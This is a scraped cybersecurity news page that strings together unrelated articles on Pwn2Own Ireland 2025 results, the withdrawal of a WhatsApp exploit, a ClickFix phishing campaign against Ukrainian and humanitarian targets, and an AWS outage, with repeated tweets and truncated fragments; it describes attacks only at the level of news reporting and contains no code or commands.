At Pwn2Own Ireland 2025 hacking competition, cybersecurity researchers from Team Z3 have withdrawn their high-stakes demonstration of a potential zero-click remote code execution (RCE) vulnerability in WhatsApp, opting instead for a private coordinated disclosure to Meta.
The event, held in Cork, Ireland, from October 21-23, featured a record-breaking $1 million bounty for such a WhatsApp exploit, drawing global attention to the platform’s security amid its three billion users.
The withdrawal disappointed on-site spectators and fellow competitors, as the exploit was poised to be the contest’s crown jewel, potentially earning Team Z3 the largest single payout in Pwn2Own history.
According to the Zero Day Initiative (ZDI), the event organizers, Team Z3 felt their research was not ready for a live public display.
Despite the no-show, ZDI emphasized the positive outcome, noting that initial assessments by their analysts will precede handover to Meta engineers, ensuring a structured response to any validated flaws.
Meta, WhatsApp’s parent company and a co-sponsor of Pwn2Own Ireland alongside Synology and QNAP, expressed continued interest in the findings, underscoring their commitment to bolstering the app’s defenses against sophisticated threats like zero-click attacks.
These exploits, which require no user interaction, have been weaponized in past spyware campaigns targeting high-profile individuals.
By facilitating this private channel, ZDI aims to give Meta ample time up to 90 days post-event to patch issues before public revelation, aligning with ethical hacking norms.
The episode highlights the evolving landscape of bug bounties and coordinated disclosures in cybersecurity.
While Pwn2Own Ireland ultimately awarded $1,024,750 for 73 unique zero-days across devices like the Samsung Galaxy S25 and various printers, the WhatsApp saga reminds vendors of the hidden risks in ubiquitous apps.
No details on the vulnerability’s specifics, such as affected versions or CVE assignment, have surfaced yet, but experts anticipate Meta will address it swiftly to mitigate potential real-world exploitation.
As the dust settles, Team Z3’s decision prioritizes responsible revelation over spectacle, potentially averting widespread harm. The cybersecurity community watches closely, awaiting Meta’s response and any patches in upcoming security advisories.
A major cybersecurity investigation has uncovered a sophisticated criminal operation called Vault Viper that exploits online gambling platforms to distribute a malicious custom browser with remote access capabilities. The threat actor, linked to the Baoying Group and connected to the Suncity Group—a major Asian crime syndicate—has created an unprecedented infrastructure combining iGaming software distribution with […]
Google’s Threat Intelligence Group (GTIG) has uncovered a sophisticated social engineering campaign orchestrated by financially motivated threat actors based in Vietnam. The ultimate objective is to compromise corporate advertising accounts and steal valuable credentials for resale or direct monetization. The threat cluster specifically targets remote workers in digital advertising roles, focusing on individuals with contract […]
Proofpoint has released a new open-source tool called PDF Object Hashing that helps security teams detect and track malicious files distributed as PDFs. The tool is now available on GitHub and represents a significant advancement in identifying suspicious documents used by threat actors in phishing campaigns, malware distribution, and business email compromise attacks. PDFs have […]
Gamers face a growing threat from cybercriminals exploiting popular gaming and communication platforms. A dangerous infostealer called RedTiger is now actively circulating in the wild, specifically designed to steal Discord credentials, gaming accounts, and sensitive financial information from unsuspecting players worldwide. Security researchers have identified multiple variants of the malware already targeting victims, with evidence […]
Security researchers have uncovered a sophisticated cyberattack campaign that exploited publicly exposed ASP.NET machine keys to compromise hundreds of Internet Information Services (IIS) servers worldwide. The operation, detected in late August and early September 2025, deployed a previously undocumented malicious module dubbed “HijackServer” that transforms legitimate web servers into tools for search engine manipulation while […]
The hacking community celebrated the end of Pwn2Own Ireland 2025. Researchers demonstrated their skills by identifying 73 unique zero-day vulnerabilities across different devices.
The event, hosted by the Zero Day Initiative (ZDI), distributed a staggering $1,024,750 in prizes, highlighting the growing sophistication of cybersecurity threats and defenses.
Over three days, 56 bugs were rewarded before the final stretch, with competitors pushing the limits on smart home gadgets, printers, and mobile devices.
This year’s contest rewarded innovation and encouraged collaboration among vendors. Companies like Meta, Synology, and QNAP supported the event.
The final day kicked off with high anticipation, as 17 attempts remained. Teams tackled everything from network-attached storage to surveillance cameras, often chaining multiple vulnerabilities for maximum impact.
$1,024,750 – 73 unique bugs – a week of amazing research on display. #Pwn2Own Ireland had it all. Success. Failure. Intrigue. You name it. Congratulations to the Master of Pwn winners @SummoningTeam! Their outstanding work earned them $187,500 and 22 point. See you in Tokyo for… pic.twitter.com/Vxd5b0yJ55
Standout performances included creative demos, such as loading the classic game Doom onto a compromised printer’s LCD screen, a nod to hackers’ flair for the dramatic.
Standout Wins And Creative Hacks Steal The Show
Chris Anastasio of Team Cluck earned $20,000 and 2 Master of Pwn points by exploiting a type confusion vulnerability in the Lexmark CX532adwe printer, granting full control over the device.
Confirmed! Chris Anastasio of Team Cluck used a single type confusion bug to exploit the Lexmark CX532adwe printer. He earns himself $20,000 and 2 Master of Pwn points. #Pwn2Ownpic.twitter.com/ZsvnexVhQo
Ben R. and Georgi G. from Interrupt Labs earned $50,000 for finding a flaw in the Samsung Galaxy S25. This flaw allowed the camera and location tracking to turn on without the user’s consent. This serves as a reminder of the privacy risks in modern smartphones.
Another big confirmation! Ben R. And Georgi G. of Interrupt Labs used an improper input validation bug to take over the Samsung Galaxy S25 – enabling the camera and location tracking in the process. They earn $50,000 and 5 Master of Pwn points. #Pwn2Ownpic.twitter.com/oNhdefPR7k
In the smart home arena, Xilokar combined four bugs, including an authentication bypass and underflow, to pwn the Philips Hue Bridge, securing $17,500 despite a partial collision with prior entries.
Similarly, Sina Kheirkhah of the Summoning Team used hard-coded credentials and an injection attack to take over a QNAP TS-453E NAS device, walking away with $20,000 and 4 points.
David Berard from Synacktiv impressed with a dual-bug attack on the Ubiquiti AI Pro surveillance camera, complete with a playful “Baby Shark” tune on the hacked system, earning $30,000 and 3 points.
Eyes wide shut! David Berard of @Synacktiv just breached the @Ubiquiti AI Pro surveillance system at #Pwn2Own. He also serenaded us with round of "Baby Shark" played through the speaker. He's off to the disclosure room with an ear worm and the details.
Namnp from Viettel Cyber Security chained a crypto bypass and heap overflow to exploit another Philips Hue Bridge, boosting their Master of Pwn ranking into the top five with $20,000.
Interrupt Labs also shone in the printer category, using path traversal and untrusted search path bugs on the Lexmark CX532adwe for a reverse shell and that unforgettable Doom demo, claiming $10,000.
Another big confirmation! Ben R. And Georgi G. of Interrupt Labs used an improper input validation bug to take over the Samsung Galaxy S25 – enabling the camera and location tracking in the process. They earn $50,000 and 5 Master of Pwn points. #Pwn2Ownpic.twitter.com/oNhdefPR7k
Collisions tempered some victories; for instance, Team Viettel’s heap-based buffer overflow on the Lexmark was unique but paired with a duplicate, still yielding $7,500.
The Thalium team from Thales Group faced similar hurdles on the Philips Hue Bridge, earning $13,500 for their novel heap overflow amid repeats.
Challenges, Withdrawals, And The Master Of Pwn Crown
Not every attempt succeeded. Daniel Frederic and Julien Cohen-Scali from Fuzzinglabs failed to fully exploit a QNAP TS-453E within the time limit, as did Frisk and Opcode from Inequation Group on the Meta Quest 3S VR headset. They achieved a denial-of-service, but fell short of code execution.
Withdrawals included CyCraft Technology’s Amazon Smart Plug attempt and Team Z3’s WhatsApp entry, reflecting the high stakes and preparation involved.
Their victories, including Kheirkhah’s QNAP hack, underscored the value of diverse skills in vulnerability research. ZDI praised all participants for advancing security, noting the event’s role in responsibly disclosing flaws to vendors.
Summary of Vulnerabilities Exploited
Researcher/Team
Target Device
Vulnerabilities Exploited
Prize
Master of Pwn Points
Notes
Xilokar (@Xilokar)
Philips Hue Bridge
Authentication bypass, underflow (plus two others)
$17,500
3.5
Partial collision
Chris Anastasio (Team Cluck)
Lexmark CX532adwe Printer
Type confusion
$20,000
2
Full success
Ben R. and Georgi G. (Interrupt Labs)
Samsung Galaxy S25
Improper input validation
$50,000
5
Enabled camera and location tracking
Yannik Marchand (kinnay)
Philips Hue Bridge
Incorrect Implementation of Authentication Algorithm (plus two others)
$13,500
2.75
Partial collision
David Berard (Synacktiv)
Ubiquiti AI Pro (Surveillance)
Pair of bugs (unspecified)
$30,000
3
Included “Baby Shark” demo
Sina Kheirkhah (@SinSinology, Summoning Team)
QNAP TS-453E
Hard-coded credentials, injection
$20,000
4
Full success
Team Viettel
Lexmark CX532adwe Printer
Heap-based buffer overflow (plus one other)
$7,500
1.5
Partial collision
Team @Neodyme
Canon imageCLASS MF654Cdw
Integer overflow
$10,000
2
Full success
Interrupt Labs
Lexmark CX532adwe Printer
Path traversal, untrusted search path
$10,000
2
Reverse shell and Doom demo
Thalium Team (Thales Group)
Philips Hue Bridge
Heap-based buffer overflow (plus two others)
$13,500
2.75
Partial collision
namnp (Viettel Cyber Security)
Philips Hue Bridge
Crypto bypass, heap overflow
$20,000
4
Full success
Looking ahead, the next challenge awaits at Pwn2Own Automotive in Tokyo from January 21-23, 2026, expanding to include EV chargers and more.
Hackers are finding new vulnerabilities all the time. Events like this are important for strengthening digital security around the world.
A sophisticated spearphishing campaign has emerged targeting humanitarian organizations and Ukrainian government agencies, leveraging weaponized PDF attachments and fake Cloudflare verification pages to distribute a dangerous WebSocket-based remote access trojan.
The operation, first uncovered in early October 2025, demonstrates a remarkable level of operational planning and infrastructure compartmentalization, with the threat actors maintaining their campaign for six months before executing their strike.
The campaign specifically targeted members of the International Red Cross, Norwegian Refugee Council, UNICEF, and regional government administrations across Ukraine, using emails impersonating the Ukrainian President’s Office.
When recipients opened the malicious PDF and clicked the embedded link, they were directed to a convincing fake Cloudflare DDoS protection gateway that appeared to be a legitimate security verification page.
PDF document page (Source – SentinelLABS)
The attackers had registered the domain zoomconference.app to mimic a legitimate Zoom conference service, hosting the malicious infrastructure on Russian-owned VPS servers in Finland.
The sophistication of this operation extends beyond its initial deception tactics. SentinelLABS researchers identified that the attackers maintained their infrastructure for only 24 hours before shutting down the public-facing domains while preserving their backend command-and-control servers, demonstrating professional-grade operational security.
The campaign infrastructure timeline revealed the attackers began operations in March 2025, with SSL certificates issued in September, suggesting meticulous preparation before the October strike.
The ClickFix Infection Mechanism and Multi-Stage Payload Delivery
The core of PhantomCaptcha’s effectiveness lies in its implementation of the ClickFix social engineering technique, a method increasingly adopted by threat actors since mid-2024.
After the fake Cloudflare page loads, victims encounter a simulated reCAPTCHA interface with an “I’m not a robot” checkbox.
Clicking this checkbox triggers a popup containing instructions written in Ukrainian, directing users to copy a token and paste it into the Windows Run dialog using the keyboard shortcut Windows+R.
This seemingly innocuous action executes malicious PowerShell code that initiates the infection chain.
Infection paths (Source – SentinelLABS)
The underlying mechanism relies on a JavaScript function named copyToken() that downloads and executes a PowerShell script.
The attackers distributed three stages of payloads, beginning with a heavily obfuscated 500KB PowerShell downloader that obscured simple download functionality through massive code obfuscation techniques.
The second stage performed comprehensive system reconnaissance, collecting computer names, domain information, usernames, process IDs, and hardware identifiers through system UUID retrieval, encrypting this data using a hardcoded XOR key before transmission.
The final payload delivered a WebSocket-based remote access trojan capable of receiving arbitrary commands encoded in Base64-formatted JSON messages.
This lightweight backdoor connected to remote servers and executed commands using PowerShell’s Invoke-Expression cmdlet, granting attackers complete remote command execution capabilities and data exfiltration access.
The malware disabled PowerShell command history logging to prevent forensic analysis, representing a deliberate effort to cover operational tracks while maintaining persistent access to compromised systems.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Does your organization suffer from a cybersecurity perception gap? Findings from the Bitdefender 2025 Cybersecurity Assessment suggest the answer is probably “yes” — and many leaders may not even realize it.
This disconnect matters. Small differences in perception today can evolve into major blind spots tomorrow. After all, perception influences what organizations prioritize, where they
Amazon Web Services (AWS), the backbone for countless websites and services, faced a severe outage last weekend that disrupted operations for millions.
The incident, which unfolded in the early hours of October 20, 2025, exposed vulnerabilities in even the most robust systems and left users scrambling.
The trouble began at 11:49 PM PDT on October 19, when AWS reported elevated error rates across multiple services in its critical US-EAST-1 region.
This key data center, handling a massive portion of internet traffic, saw failures that cascaded to Amazon.com’s e-commerce platform, various subsidiaries, and even AWS’s own support teams.
Customers attempting to shop, stream, or access cloud resources encountered frustrating errors, with some services grinding to a halt entirely.
Path To Full Recovery And Lessons Learned
AWS engineers quickly pinpointed the root cause: DNS resolution problems affecting the regional endpoints for DynamoDB, their popular NoSQL database service.
DNS, the internet’s phonebook, failed to direct traffic properly, causing a domino effect. By 12:26 AM PDT on October 20, the team implemented fixes, restoring DynamoDB functionality by 2:24 AM PDT.
However, the outage’s aftermath lingered, impairing a subset of internal subsystems and prompting temporary restrictions on launching new EC2 virtual machines to prevent further instability.
Recovery progressed steadily through the morning. By 12:28 PM PDT, most AWS customers and dependent services, including major platforms like Netflix and government sites, reported substantial improvements.
Engineers gradually reduced the power on EC2 launches while fixing remaining issues. By 3:01 PM PDT, normal operations were fully restored, enabling smooth operations across the board.
In a detailed post-incident report, AWS emphasized the event’s scope and its rapid response. While no cyberattack was suspected, the outage highlighted the fragility of DNS in cloud ecosystems.
Experts note that such incidents underscore the need for diversified infrastructure and robust failover mechanisms.
AWS urges users to monitor the AWS Health Dashboard for ongoing updates, with a comprehensive summary available on their site.
Eyes wide shut! David Berard of 
.webp)
.webp)